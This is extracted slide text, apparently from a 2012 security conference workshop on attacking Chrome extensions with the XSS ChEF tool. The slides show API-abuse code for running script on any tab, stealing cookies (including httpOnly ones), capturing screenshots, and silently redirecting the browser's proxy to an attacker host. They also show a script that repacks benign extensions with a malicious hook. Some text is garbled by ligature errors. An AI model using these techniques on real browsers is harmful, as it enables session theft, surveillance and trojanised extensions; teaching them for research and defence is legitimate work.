  • 34. Easy  exploita5on • Monitor  open  tabs  of  vicPms • Execute  JS  on  every  tab • Extract  HTML • Read/write  cookies • Access  localStorage • Manipulate  browser  history • Take  screenshots  of  tabs • Inject  BeEF  hooks  /  keyloggers 34
  • 36. XSS  ChEF Launching  server $ php -v PHP 5.3.12 (cli) (built: Jun 7 2012 22:49:42) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans $ php server.php 2>command.log XSS ChEF server by Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: php server.php [port=8080] [host=127.0.0.1] Communication is logged to stderr, use php server.php [port] 2>log.txt 2012-07-22 12:40:06 [info] Server created 2012-07-22 12:40:06 ChEF server is listening on 127.0.0.1:8080 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Connected 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Performing handshake 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Handshake sent 2012-07-22 12:40:06 New hook c3590977550 from 127.0.0.1 ... 36
  • 42. API  abuse • chrome.tabs.query  -­‐  gets  access  to  all  tabs   URLs  (even  incognito!),  Ptles,  documents  etc. chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t}); }); 42
  • 43. API  abuse • chrome.tabs.executeScript  -­‐  global  XSS  on  any   tab • bypasses  CSP chrome.tabs.executeScript(null, { code:"alert(document.cookie)" }); 43
  • 44. API  abuse • chrome.tabs.captureVisibleTab chrome.tabs.captureVisibleTab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url}); }); 44
  • 45. API  abuse • chrome.cookies – read/write  cookies,  even  h<pOnly chrome.cookies.getAll({url: chrome.cookies.set({ "https://www.google.com/"}, cb); url: 'https://www.google.com/', name: 'test-chef', value: 'test-ok', {"domain": ".google.com", secure: true, "expirationDate": 1358717774.49, httpOnly: true, "hostOnly": false, expirationDate: null, "httpOnly": true, path: '/' "name": "NID", }, cb); "path": "/", "secure": false, "session": false, "storeId": "0", "value": "61=...." },... 45
  • 46. API  abuse • chrome.proxy  -­‐  silently  change  HTTP  proxy! var evilProxy = { "mode": "fixed_servers", "rules": { "bypassList": ["<local>","ATTACKER_DOMAIN.COM"], // EXCLUDE BACK CHANNEL FROM PROXY "singleProxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } } } chrome.proxy.settings.set({value: evilProxy, scope: 'regular'}, cb); 46
  • 47. API  abuse • chrome.bookmarks  -­‐  interact  with  bookmarks chrome.bookmarks.search("http", cb); {"dateAdded": 1342946320, "id": "123", "index": 0, "parentId": "21", "title": "GMail", "url": "https://mail.google.com/"} 47
  • 48. Pre-­‐Workshop  Info • Requirements – Latest  version  of  XSS  ChEF  required  (w/  dependencies) • PHP  5.3  +  HTTP  server,  opFonally  node.js • unzip,  curl   • Only  heavily  tested  under  OS  X  &  Linux – Chrome – Selected  extensions • All  links  can  be  found  on hdp://kotowicz.net/brucon 48
  • 50. Workshop • Part  one:  ExploitaPon – Discovery – AutomaFon • Part  two:  Repacking – Leveraging  the  human  factor 50
  • 51. Part  one:  Exploita5on • Slick  RSS • Slick  RSS:  Feed  Finder 51
  • 52. Part  one:  Exploita5on • Web  Developer 52
  • 53. Part  one:  Exploita5on • Springpad  Extension 53
  • 54. Part  one:  Exploita5on • Cookie  Manager 54
  • 56. Part  Two:  Repacking • Wanted  to  get  MORE  privileges • UPlizes  “click-­‐through-­‐syndrome” • You  can  repack  any  other  benign  extension,   adding  malicious  part  (e.g.  XSS  chef  hook) 56
  • 57. Part  Two:  Repacking $ ./repacker-webstore.sh <ID> output.crx Unpacking ... Injecting xsschef... Adding permissions... Saving... Done. Moving signed extension to output.crx 57